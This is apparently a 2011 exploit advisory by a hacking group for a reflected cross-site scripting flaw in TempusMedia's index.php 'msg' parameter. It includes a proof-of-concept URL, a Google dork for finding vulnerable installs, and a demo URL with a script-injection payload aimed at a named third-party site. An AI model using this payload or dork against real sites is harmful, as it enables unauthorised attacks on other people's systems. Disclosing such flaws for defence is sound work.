# Exploit Title: TempusMedia (index.php) Cross-site scripting Vulnerability # Date: 2011-07-08 # Author: Net.Edit0r # Software Link: http://www.tempusmedia.com/ # Version : 1.0.0 # Tested on: ubuntu 11.04 # CVE : - ----------------------------------------------------------------------------------------- TempusMedia (index.php) Cross-site scripting Vulnerability => XSS Vulnerability ----------------------------------------------------------------------------------------- Author : Net.Edit0r Date : 2011-07-08 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : [ webapps ] My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: [ index.php?msg=Xss ] ~ [PoC] ~: Http://[victim]/path-to-wp/index.php?msg=[Xss] Dork: ~~~~~ Google : Powered By: TempusMedia Demo URL: ~~~~~~~~~ - http://www.bonethefish.com/index.php?msg="><script>alert(100000)</script> Timeline: ~~~~~~~~~ - 05 - 07 - 2011 bug found. - 07 - 07 - 2011 vendor contacted, but no response. - 07 - 07 - 2011 Advisories release. Contact: ~~~~~~~~~ Net.Edit0r@att.net ~ Black.hat.tm@gmail.com --------------------------------------------------------------------------- Greetz To :DarkCoder | Amir-MaGiC | H3x | D3adlY | _AttAcK_ |Dr.Nil0 Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.b0y | Mikili | HUrr!c4nE Web Greetz :http://Black-Hg.Org & http://mn-team.net/ & http://pentesters.ir/ [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People -------------------------------- [ EOF ] ----------------------------------